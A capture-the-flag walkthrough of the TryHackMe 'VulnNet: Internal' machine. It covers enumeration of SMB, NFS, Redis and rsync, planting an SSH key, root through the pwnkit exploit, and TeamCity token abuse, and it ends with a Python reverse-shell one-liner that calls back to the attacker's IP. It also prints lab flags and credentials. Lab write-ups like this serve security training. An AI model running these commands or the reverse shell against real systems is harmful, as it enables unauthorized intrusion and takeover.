VulnNet: Internal (SMB, NFS, Redis, Port Forwarding)
First, we need to enumerate using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ nmap -A 10.10.207.6 | tee nmap.log 130 ↵
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 20:57 +0630
Nmap scan report for 10.10.207.6
Host is up (0.24s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35721/tcp6 mountd
| 100005 1,2,3 45401/tcp mountd
| 100005 1,2,3 59949/udp6 mountd
| 100005 1,2,3 60579/udp mountd
| 100021 1,3,4 34197/tcp nlockmgr
| 100021 1,3,4 35019/tcp6 nlockmgr
| 100021 1,3,4 37326/udp nlockmgr
| 100021 1,3,4 38819/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -41m02s, deviation: 1h09m16s, median: -1m03s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2022-04-24T16:27:04+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-24T14:27:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.78 secondsScan using rustscan.
22/tcp open ssh syn-ack
111/tcp open rpcbind syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
873/tcp open rsync syn-ack
2049/tcp open nfs syn-ack
6379/tcp open redis syn-ack
34197/tcp open unknown syn-ack
45401/tcp open unknown syn-ack
60411/tcp open unknown syn-ack
60551/tcp open unknown syn-ackPort 139,445
You will find some interesing shares.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ smbclient -L 10.10.207.6
Enter WORKGROUP\hnl's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup availableConnect to this shares and download all files.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ smbclient '\\10.10.207.6\shares' 130 ↵
Enter WORKGROUP\hnl's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Feb 2 15:50:09 2021
.. D 0 Tue Feb 2 15:58:11 2021
temp D 0 Sat Feb 6 18:15:10 2021
data D 0 Tue Feb 2 15:57:33 2021
11309648 blocks of size 1024. 3278676 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \temp\services.txt of size 38 as temp/services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \data\data.txt of size 48 as data/data.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \data\business-req.txt of size 190 as data/business-req.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> You can find the very first flag at /temp/services.txt
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ cat temp/services.txt
THM{0a09d51e488f5fa105d8d866a497440a}The content of data.txt and business-req.txt in /data.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal/data
╰─➤ cat business-req.txt
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal/data
╰─➤ cat data.txt
Purge regularly data that is not needed anymorePort 2049
You can see some interesting share in nfs.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ showmount -e 10.10.207.6
Export list for 10.10.207.6:
/opt/conf *Mount to local. Nothing interesting in this share.
╭─hnl@hnl /mnt/nfs-share/wildmidi
╰─➤ sudo mount -t nfs 10.10.207.6:/opt/conf /mnt/nfs-shareYou can find redis password in /redis/redis.conf
Port 6379
Connect with redis-cli.
╭─hnl@hnl /mnt/nfs-share
╰─➤ redis-cli -h 10.10.207.6 -a 'B65Hx562F@ggAZ@F'
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.207.6:6379>Here is a useful link for redis pentest https://book.hacktricks.xyz/pentesting/6379-pentesting-redis. Enumerate redis and read the flag.
10.10.207.6:6379> KEYS *
1) "int"
2) "marketlist"
3) "tmp"
4) "internal flag"
5) "authlist"
10.10.207.6:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"Enumerate redis and read the key.
0.10.85.164:6379> LRANGE marketlist 1 16
1) "Penetration Testing"
2) "Programming"
3) "Data Analysis"
4) "Analytics"
5) "Marketing"
6) "Media Streaming"
10.10.207.6:6379> LRANGE authlist 0 50
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
4) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzDecode the base64.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ echo 'QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==' | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72vPort 873
Here is a useful link of rsync pentest https://book.hacktricks.xyz/pentesting/873-pentesting-rsync.
╭─hnl@hnl /mnt/nfs-share/redis
╰─➤ nmap -sV --script "rsync-list-modules" -p873 10.10.207.6
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 23:07 +0630
Nmap scan report for 10.10.207.6
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
| rsync-list-modules:
|_ files Necessary home interaction
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 secondsList the share folder.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ rsync -av --list-only rsync://rsync-connect@10.10.207.6/files 5 ↵
Password:
receiving incremental file list
drwxr-xr-x 4,096 2021/02/01 19:21:14 .
drwxr-xr-x 4,096 2021/02/06 19:19:29 sys-internal
-rw------- 61 2021/02/06 19:19:28 sys-internal/.Xauthority
lrwxrwxrwx 9 2021/02/01 20:03:19 sys-internal/.bash_history -> /dev/null
-rw-r--r-- 220 2021/02/01 19:21:14 sys-internal/.bash_logout
-rw-r--r-- 3,771 2021/02/01 19:21:14 sys-internal/.bashrc
-rw-r--r-- 26 2021/02/01 19:23:18 sys-internal/.dmrc
-rw-r--r-- 807 2021/02/01 19:21:14 sys-internal/.profileDownload share folder into our local machine's folder.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ rsync -av rsync://rsync-connect@10.10.207.6/files ./rsync-filesGenerate ssh key.
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHmsE/qACwaksUEoBvDE4wFu0/N5eZeNQEX9upOp8Bh4KTZsUcMqo7OSdztZbvkSwwp0S6C3mk9WLioJbQ2dDFC64ZyT/LUAgNZgZkSRZtufQa9lhUgqNYhg/0oT1juH5rGTJhoGa8MROpRhp/LiKXw8g4wOQggrG+xqrnCG84PCcb0bq73XW7XMYN9koLXokwl3GSlX/AkSn3VWgBcnj73IX2eI2yvYSAzckYyWeu9fR6EX/j8Rfj3Z7Tsy0W4iuhHwSGPJHX8yDms9Sx07nQmMGGKW+RmQ6p1dqDt9g/R1L2aXDJLJnZOGzR4ZqdxFpyl3R/R026HXKyeSCSAvaE34GIzBowe6g9K4h/Ewe3zwIBlLW8TGq7L7EBPR2j6d2yYSbniH3GMio88N+vmF4E919gMMlgMqi4fJOhoy/l++4vuBqKAEpGEcywblNLw4YSe59dSBurrFeTNrC3O6CNyO8GyDtQ3wxNOGI7nMe7yOesabNTdz9qDRXdbpyXDwE= hnl@hnlUpload it.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ rsync -av ./authorized_keys rsync://rsync-connect@10.10.207.6/files/sys-internal/.ssh/
Password:
sending incremental file list
authorized_keys
sent 672 bytes received 35 bytes 157.11 bytes/sec
total size is 561 speedup is 0.79Finally, we can connect ssh with our own private key.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ ssh -i id_rsa sys-internal@10.10.207.6
The authenticity of host '10.10.207.6 (10.10.207.6)' can't be established.
ECDSA key fingerprint is SHA256:0ysriVjo72WRJI6UecJ9s8z6QHPNngSiMUKWFTO6Vr4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.207.6' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
541 packages can be updated.
342 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
sys-internal@vulnnet-internal:~$ User
You can read the user flag.
sys-internal@vulnnet-internal:~$ cat user.txt
THM{da7c20696831f253e0afaca8b83c07ab}Download linpeas and enumerate the system. The system is vulnerable with pwnkit exploit. Here is Poc https://github.com/arthepsy/CVE-2021-4034
sys-internal@vulnnet-internal:~/Desktop$ wget http://10.9.0.63:1234/linpeas
sys-internal@vulnnet-internal:~/Desktop$ chmod 777 linpeas
sys-internal@vulnnet-internal:~/Desktop$ ./linpeasRoot
sys-internal@vulnnet-internal:~/Desktop$ gcc exploit.c -o exploit
sys-internal@vulnnet-internal:~/Desktop$ chmod 777 exploit
sys-internal@vulnnet-internal:~/Desktop$ ./exploit
# whoami
root
# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
# The Truth (Root)
With ss command, you will see some opened TCP port.
sys-internal@vulnnet-internal:~$ ss -t
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 72 10.10.207.6:ssh 10.9.0.63:33534
CLOSE-WAIT 1 0 [::ffff:127.0.0.1]:34921 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:32799 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:32799 Let's make local port forwarding.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ ssh -i id_rsa sys-internal@10.10.207.6 -L 8080:127.0.0.1:8111
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.comWhen you broswe, http://127.0.0.1:8080, you will see teamcity page. We will need Authentication Token to login.
You will find Timecity directory on /.
sys-internal@vulnnet-internal:~$ ls -al /
total 533824
drwxr-xr-x 24 root root 4096 Feb 6 2021 .
drwxr-xr-x 24 root root 4096 Feb 6 2021 ..
drwxr-xr-x 2 root root 4096 Feb 2 2021 bin
drwxr-xr-x 3 root root 4096 Feb 1 2021 boot
drwx------ 2 root root 4096 Feb 1 2021 .cache
drwxr-xr-x 17 root root 3720 Apr 25 03:42 dev
drwxr-xr-x 129 root root 12288 Feb 7 2021 etc
drwxr-xr-x 3 root root 4096 Feb 1 2021 home
lrwxrwxrwx 1 root root 34 Feb 1 2021 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx 1 root root 33 Feb 1 2021 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x 18 root root 4096 Feb 1 2021 lib
drwxr-xr-x 2 root root 4096 Feb 1 2021 lib64
drwx------ 2 root root 16384 Feb 1 2021 lost+found
drwxr-xr-x 4 root root 4096 Feb 2 2021 media
drwxr-xr-x 2 root root 4096 Feb 1 2021 mnt
drwxr-xr-x 4 root root 4096 Feb 2 2021 opt
dr-xr-xr-x 139 root root 0 Apr 25 03:42 proc
drwx------ 8 root root 4096 Feb 6 2021 root
drwxr-xr-x 27 root root 880 Apr 25 08:37 run
drwxr-xr-x 2 root root 4096 Feb 2 2021 sbin
drwxr-xr-x 2 root root 4096 Feb 1 2021 srv
-rw------- 1 root root 546529280 Feb 1 2021 swapfile
dr-xr-xr-x 13 root root 0 Apr 25 03:42 sys
drwxr-xr-x 12 root root 4096 Feb 6 2021 TeamCity
drwxrwxrwt 11 root root 4096 Apr 25 08:41 tmp
drwxr-xr-x 10 root root 4096 Feb 1 2021 usr
drwxr-xr-x 13 root root 4096 Feb 1 2021 var
lrwxrwxrwx 1 root root 31 Feb 1 2021 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx 1 root root 30 Feb 1 2021 vmlinuz.old -> boot/vmlinuz-4.15.0-20-genericGo to this directory and find token.
sys-internal@vulnnet-internal:/TeamCity$ grep -R token
logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 4319495926070655877 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 4319495926070655877 (use empty username with the token as the password to access the server)After login, you will see a dashboard.
At build step, run with python.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.63",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")In netcat session, we got reverse shell.
Last updated
Was this helpful?